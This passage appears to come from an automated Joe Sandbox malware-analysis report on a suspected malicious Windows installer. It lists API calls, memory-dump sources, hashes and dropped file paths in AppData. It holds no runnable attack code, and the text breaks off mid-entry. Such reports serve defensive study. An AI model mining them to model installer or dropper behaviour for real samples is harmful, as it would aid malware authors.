                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
                                                                        • Instruction ID: 0892b5ef0b2723f07dcd522954823931705bd605f292322b3a664a2a0928558f
                                                                        • Opcode Fuzzy Hash: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
                                                                        • Instruction Fuzzy Hash: CDD0C972908020AFC2103728AE0C89BBB65DB543717018B31F965A22B0C7305C528AA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00402C44 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: Open
                                                                        • String ID:
                                                                        • API String ID: 71445658-0
                                                                        • Opcode ID: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
                                                                        • Instruction ID: 83e72149abe1372da0a381261de05d436a54b8bdbe31dfced4d63089b9680d6c
                                                                        • Opcode Fuzzy Hash: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
                                                                        • Instruction Fuzzy Hash: A0E04F7624010CBADB00DFA4ED46F9577ECEB14705F108425B608D6091C674E5008768
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405BD9 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330C,00409230,00409230,004031FE,00413E78,00004000,?,00000000,?), ref: 00405BED
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                        • Instruction ID: e5271f86abd3e691175676240f3b6d2dabcfddd4658b863dc1b472273301a449
                                                                        • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                        • Instruction Fuzzy Hash: 8EE08632104259ABDF109E548C04EEB775CFB04350F044432F911E3140D231E820DBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040417B Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
                                                                        • Instruction ID: 08475c9ad2706a2906e61487a991445bf78722f829394d34d4d14abd34e5eaae
                                                                        • Opcode Fuzzy Hash: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
                                                                        • Instruction Fuzzy Hash: 73C09B717443007BDA308B50ED49F1777546798B40F144439B714F50D4C674E451D61D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00404164 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(00000028,?,00000001,00403F90), ref: 00404172
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                                                                        • Instruction ID: f15b28e5f211e7e8d1db6812d8cffd834990aabd0fd5fa3204c122ebb67abe5b
                                                                        • Opcode Fuzzy Hash: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                                                                        • Instruction Fuzzy Hash: 2BB01235684202BBEE314B00ED0DF957E62F76C701F008474B340240F0CAB344B2DB09
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040330F Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: FilePointer
                                                                        • String ID:
                                                                        • API String ID: 973152223-0
                                                                        • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                        • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                                                        • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                        • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00404151 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • KiUserCallbackDispatcher.NTDLL(?,00403F29), ref: 0040415B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: CallbackDispatcherUser
                                                                        • String ID:
                                                                        • API String ID: 2492992576-0
                                                                        • Opcode ID: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
                                                                        • Instruction ID: 866da2961ca677aab693f91c7c1a68d27da85f1a7500f820b7212f7e549623fc
                                                                        • Opcode Fuzzy Hash: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
                                                                        • Instruction Fuzzy Hash: 62A00276544101ABCB115B50EF48D057B62BBA47517518575B1455003486715461EF69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 00404B10 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404B28
                                                                        • GetDlgItem.USER32(?,00000408), ref: 00404B33
                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7D
                                                                        • LoadBitmapW.USER32(0000006E), ref: 00404B90
                                                                        • SetWindowLongW.USER32(?,000000FC,00405108), ref: 00404BA9
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBD
                                                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCF
                                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404BE5
                                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BF1
                                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C03
                                                                        • DeleteObject.GDI32(00000000), ref: 00404C06
                                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C31
                                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3D
                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD3
                                                                        • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFE
                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D12
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404D41
                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4F
                                                                        • ShowWindow.USER32(?,00000005), ref: 00404D60
                                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5D
                                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC2
                                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED7
                                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EFB
                                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F1B
                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404F30
                                                                        • GlobalFree.KERNEL32(?), ref: 00404F40
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB9
                                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00405062
                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405071
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00405091
                                                                        • ShowWindow.USER32(?,00000000), ref: 004050DF
                                                                        • GetDlgItem.USER32(?,000003FE), ref: 004050EA
                                                                        • ShowWindow.USER32(00000000), ref: 004050F1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                        • String ID: $M$N
                                                                        • API String ID: 1638840714-813528018
                                                                        • Opcode ID: db08064a331c8b710d2bfbefb5f5365b1a6743964771edbed48d05eba51cbb05
                                                                        • Instruction ID: d71a5cbf05b966a5fca8a5aa47d1df2e6c399d67ef135bcf6f64f468dd7cdb7f
                                                                        • Opcode Fuzzy Hash: db08064a331c8b710d2bfbefb5f5365b1a6743964771edbed48d05eba51cbb05
                                                                        • Instruction Fuzzy Hash: 6E027FB0900209EFEB209F54DD85AAE7BB5FB84314F10857AF610BA2E0D7799D52CF58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004045CA Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 269stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404619
                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00404643
                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 004046F4
                                                                        • CoTaskMemFree.OLE32(00000000), ref: 004046FF
                                                                        • lstrcmpiW.KERNEL32(ExecToStack,004226D0,00000000,?,?), ref: 00404731
                                                                        • lstrcatW.KERNEL32(?,ExecToStack), ref: 0040473D
                                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474F
                                                                          • Part of subcall function 004056AA: GetDlgItemTextW.USER32(?,?,00000400,00404786), ref: 004056BD
                                                                          • Part of subcall function 0040617E: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\160420241245287.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,74DF3420,00403512), ref: 004061E1
                                                                          • Part of subcall function 0040617E: CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                          • Part of subcall function 0040617E: CharNextW.USER32(?,"C:\Users\user\Desktop\160420241245287.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,74DF3420,00403512), ref: 004061F5
                                                                          • Part of subcall function 0040617E: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,74DF3420,00403512), ref: 00406208
                                                                        • GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 00404810
                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040482B
                                                                        • SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048B1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                        • String ID: A$C:\Users\user\AppData\Roaming\opbevaringssteder$ExecToStack
                                                                        • API String ID: 2246997448-773504722
                                                                        • Opcode ID: 5e1be59e26550fe03483dde9140ef9c7df16d0723f1807c21cae017824fc49c2
                                                                        • Instruction ID: fc6e5784adbf23f3bf0ca4204261aafad130db7b69f5cfc08d06a9dfd3cb4e02
                                                                        • Opcode Fuzzy Hash: 5e1be59e26550fe03483dde9140ef9c7df16d0723f1807c21cae017824fc49c2
                                                                        • Instruction Fuzzy Hash: 1B916FB2900209ABDB11AFA1CC85AAF77B8EF85354F10847BF701B72D1D77C99418B69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040206A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123comCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                                        Strings
                                                                        • C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Foldedrs, xrefs: 004020FB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: CreateInstance
                                                                        • String ID: C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Foldedrs
                                                                        • API String ID: 542301482-3154209270
                                                                        • Opcode ID: 92aaacdbcca9cd8e92e7536e0d4b0f4a641a28c62365b060c4e49ce7a33acec8
                                                                        • Instruction ID: b9114a0b4d3c9f05545c6126c0c632b8b73b1fcf7d0bd01aa9b6132af3d7cd36
                                                                        • Opcode Fuzzy Hash: 92aaacdbcca9cd8e92e7536e0d4b0f4a641a28c62365b060c4e49ce7a33acec8
                                                                        • Instruction Fuzzy Hash: 4B414F75A00105BFCB00DFA4C988EAE7BB5AF49318B20416AF505EF2D1D679AD41CB55
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00402770 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277F
                                                                        Memory Dump Source
